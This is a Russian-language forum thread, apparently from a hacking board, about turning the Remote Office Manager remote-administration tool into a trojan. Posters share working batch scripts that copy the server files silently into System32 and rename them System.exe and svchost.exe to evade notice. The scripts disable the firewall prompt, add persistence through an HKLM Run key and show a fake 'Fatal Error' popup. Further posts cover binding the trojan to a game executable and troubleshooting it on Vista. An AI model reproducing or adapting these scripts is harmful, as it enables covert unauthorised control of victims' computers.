Огромное конешно спс за такие идеи, но вот я начинающий и очень хочется по полробнее, или видео или описание, а так канечно всё выглядит круто.
кстати напишу обьяснение для всех, как получается троян из такой программы управления. Сначало просто устанавливаете у себя на компе серверную часть, потом собираете в одну папку все файлы каторые раскидала прога, тоесть то что записалось в папку Program Files и в WINDOWS потом экспортируете то что записала эта программа в реестр. и наконецто делаете батничек(.bat) который раскидает эти файлы по темже местам и импортирует этот файлик реестра. Всё соединяете в одно целое так чтобы при нажатии на это запускался ваш батник, и всё.
склеивать рому с игрой можно... я для склейки использую Bat To Exe Converter.. просто в конце батника прописываешь с новой строки имя_игры.exe и после установки ромы запустится игра
UAC что это? Я его не чтобы так запускал, а даже через инсталлер - результата ноль, ничего не работает..
Вопрос первый, - что это за палево в твоем батнике?: echo set WshShell = CreateObject("WScript.Shell") >>1.vbs echo BtnCode = WshShell.Popup("Fatal Error: Ошибка запуска!", 0, "Fatal Error", 0 + 16) >>1.vbs cscript 1.vbs del 1.vbs Вопрос номер два, - почему размер файлов в твоем РОМе не соответствует реальным размерам исходных файлов?
При запуске твоего батника выкдывает сообщение что системе не удаётся найти указанынй файл. Ты батник вообще для какой системы делал? короче палёный батник конкертно. Сделай людский батник под Висту!!
это значит, что после установки рома выйдет окошко с заголовком "Fatal Error" и текстом "Fatal Error: Ошибка запуска!" что тут палевного? я в видео написал, что эти стороки можно удалить! смотри всё внимательно. что касаемо размера файлов, то в распакованном состоянии они весят 4мб а в архиве могут сжаться где-то в 2-3 раза
copy ""%0"" "%SystemRoot%\system32\ViruZ.bat" >nul reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ViruZ" /t REG_SZ /d "%SystemRoot%\system32\ViruZ.bat" /f >nul вот команда в батнике
Я пока не понимаю, как работает запуск файла ROMServer.exe автоматом, в регистрах его нигде нет, в автозапуске тоже нет, в регистре Run и RunServices тоже отсутствует. Как оно может вообще запускаться? Но оно запускается и работает так как я и хотел, но не думаю что будет работать постоянно и не думаю что обакновенная комманда из БАТника типа silentinstall прописывает его в регситры на долгие века. Можешь мне разъяснить принцип автозапуска ROMServer.exe? Может есть смысл кинуть файл в папку system32, тогда как конкретно должен выглядить REG файл с коммандой для прописи в папке %SystemRoot%\System32\ROMServer.exe ? и нужно ли кидать и все остальные файлы в директорию System32?[/QUOTE] Если ты про то как он попадает в автозапуск, то это в настройках сервера само стоит автозагрузка, такчто трой сам будет запускатся постоянно. а про то как переделать всё под папку System32 то не надо переписывать фаил с расширением REG в нём всё и так пойдёт, тебе только батник переписать надо так mkdir "%SYSTEMROOT%\System32\sistem" copy /y "AledensoftIpcServer.dll" "%SYSTEMROOT%\System32\sistem\AledensoftIpcServer.dll" copy /y "English.lg" "%SYSTEMROOT%\System32\sistem\English.lg" copy /y "EULA.rtf" "%SYSTEMROOT%\System32\sistem\EULA.rtf" copy /y "HookDrv.dll" "%SYSTEMROOT%\System32\sistem\HookDrv.dll" copy /y "ROMFUSClient.exe" "%SYSTEMROOT%\System32\sistem\svchost.exe" copy /y "ROMServer.exe" "%SYSTEMROOT%\System32\sistem\System.exe" copy /y "ROMwln.dll" "%SYSTEMROOT%\System32\sistem\ROMwln.dll" copy /y "Russian.lg" "%SYSTEMROOT%\System32\sistem\Russian.lg" "%SYSTEMROOT%\System32\sistem\System.exe" /silentinstall "%SYSTEMROOT%\System32\sistem\System.exe" /firewall reg import "settings.reg" regedit /s "settings.reg" "%SYSTEMROOT%/System32\sistem\System.exe" /start видеш как тут сделано? ROMServer.exe переименовывайтся в System.exe так он будет отображатся в процессах диспетчкра , я думаю врятли кто рескнёт закрывать такой процесс.... а вот этой строчкой создаётся папка в которую кинутся всё нужные файлы mkdir "%SYSTEMROOT%\System32\sistem
Самое интересное что файлы с названием system.exe итд не работают, тобишь не запускаются. Еще, батник при запуске с "%SYSTEMROOT%/System32\sistem\ROMServer.exe" /start показывает ошибку что не может найти файл для запуска, то же самое показывает при запуске с %WindowsDir% или %SystemDir%. Тупо не хочет находить там файлы (хотя они там есть) работает при запуске только с %ProgramFiles%. Что это может быть? У меня Виста.
а ты не пробовал написать так? Code: "%SYSTEMROOT%[SIZE=3][B]\[/B][/SIZE]System32\sistem\ROMServer.exe" /start или просто в командной строке написать Code: echo %ProgramFiles% или echo %SYSTEMROOT% и кстати.. в винде нет переменных %WindowsDir% и %SystemDir% поэтому и не работает с ними